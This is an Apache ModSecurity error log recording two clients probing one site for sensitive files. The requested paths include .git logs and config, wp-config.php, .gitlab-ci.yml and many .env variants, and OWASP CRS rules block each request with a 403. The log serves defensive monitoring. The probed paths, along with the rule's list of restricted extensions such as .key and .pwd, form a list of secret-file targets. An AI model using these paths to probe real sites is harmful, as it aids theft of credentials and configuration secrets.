[Tue Dec 02 08:05:31.110651 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aS6Pu50fE9xfoNXam56O3wAAAAU"]
[Tue Dec 02 08:05:31.110999 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aS6Pu50fE9xfoNXam56O3wAAAAU"]
[Tue Dec 02 08:05:31.111310 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aS6Pu50fE9xfoNXam56O3wAAAAU"]
[Tue Dec 02 08:05:31.435094 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aS6Pu50fE9xfoNXam56O4AAAAAU"]
[Tue Dec 02 08:05:31.435372 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aS6Pu50fE9xfoNXam56O4AAAAAU"]
[Tue Dec 02 08:05:31.435592 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aS6Pu50fE9xfoNXam56O4AAAAAU"]
[Tue Dec 02 08:05:31.950500 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aS6Pu50fE9xfoNXam56O4QAAAAU"]
[Tue Dec 02 08:05:31.950889 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aS6Pu50fE9xfoNXam56O4QAAAAU"]
[Tue Dec 02 08:05:31.951171 2025] [:error] [pid 464291] [client 195.178.110.201:37744] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aS6Pu50fE9xfoNXam56O4QAAAAU"]
[Tue Dec 02 08:38:20.911355 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS6XbJvtKXnzGjDKyabjGQAAAAk"]
[Tue Dec 02 08:38:20.911584 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS6XbJvtKXnzGjDKyabjGQAAAAk"]
[Tue Dec 02 08:38:20.911775 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aS6XbJvtKXnzGjDKyabjGQAAAAk"]
[Tue Dec 02 08:38:20.943493 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS6XbJvtKXnzGjDKyabjGgAAAAk"]
[Tue Dec 02 08:38:20.943742 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS6XbJvtKXnzGjDKyabjGgAAAAk"]
[Tue Dec 02 08:38:20.943981 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aS6XbJvtKXnzGjDKyabjGgAAAAk"]
[Tue Dec 02 08:38:20.975140 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aS6XbJvtKXnzGjDKyabjGwAAAAk"]
[Tue Dec 02 08:38:20.975359 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aS6XbJvtKXnzGjDKyabjGwAAAAk"]
[Tue Dec 02 08:38:20.975548 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aS6XbJvtKXnzGjDKyabjGwAAAAk"]
[Tue Dec 02 08:38:21.007072 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aS6XbZvtKXnzGjDKyabjHAAAAAk"]
[Tue Dec 02 08:38:21.007332 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aS6XbZvtKXnzGjDKyabjHAAAAAk"]
[Tue Dec 02 08:38:21.007613 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.remote"] [unique_id "aS6XbZvtKXnzGjDKyabjHAAAAAk"]
[Tue Dec 02 08:38:21.038718 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aS6XbZvtKXnzGjDKyabjHQAAAAk"]
[Tue Dec 02 08:38:21.038950 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aS6XbZvtKXnzGjDKyabjHQAAAAk"]
[Tue Dec 02 08:38:21.039148 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aS6XbZvtKXnzGjDKyabjHQAAAAk"]
[Tue Dec 02 08:38:21.070959 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aS6XbZvtKXnzGjDKyabjHgAAAAk"]
[Tue Dec 02 08:38:21.071213 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aS6XbZvtKXnzGjDKyabjHgAAAAk"]
[Tue Dec 02 08:38:21.071424 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.development"] [unique_id "aS6XbZvtKXnzGjDKyabjHgAAAAk"]
[Tue Dec 02 08:38:21.102723 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aS6XbZvtKXnzGjDKyabjHwAAAAk"]
[Tue Dec 02 08:38:21.102951 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aS6XbZvtKXnzGjDKyabjHwAAAAk"]
[Tue Dec 02 08:38:21.103172 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aS6XbZvtKXnzGjDKyabjHwAAAAk"]
[Tue Dec 02 08:38:21.135504 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aS6XbZvtKXnzGjDKyabjIAAAAAk"]
[Tue Dec 02 08:38:21.135722 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aS6XbZvtKXnzGjDKyabjIAAAAAk"]
[Tue Dec 02 08:38:21.135942 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.test"] [unique_id "aS6XbZvtKXnzGjDKyabjIAAAAAk"]
[Tue Dec 02 08:38:21.167288 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aS6XbZvtKXnzGjDKyabjIQAAAAk"]
[Tue Dec 02 08:38:21.167490 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aS6XbZvtKXnzGjDKyabjIQAAAAk"]
[Tue Dec 02 08:38:21.167700 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aS6XbZvtKXnzGjDKyabjIQAAAAk"]
[Tue Dec 02 08:38:21.167898 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aS6XbZvtKXnzGjDKyabjIQAAAAk"]
[Tue Dec 02 08:38:21.199457 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aS6XbZvtKXnzGjDKyabjIgAAAAk"]
[Tue Dec 02 08:38:21.199725 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aS6XbZvtKXnzGjDKyabjIgAAAAk"]
[Tue Dec 02 08:38:21.199928 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aS6XbZvtKXnzGjDKyabjIgAAAAk"]
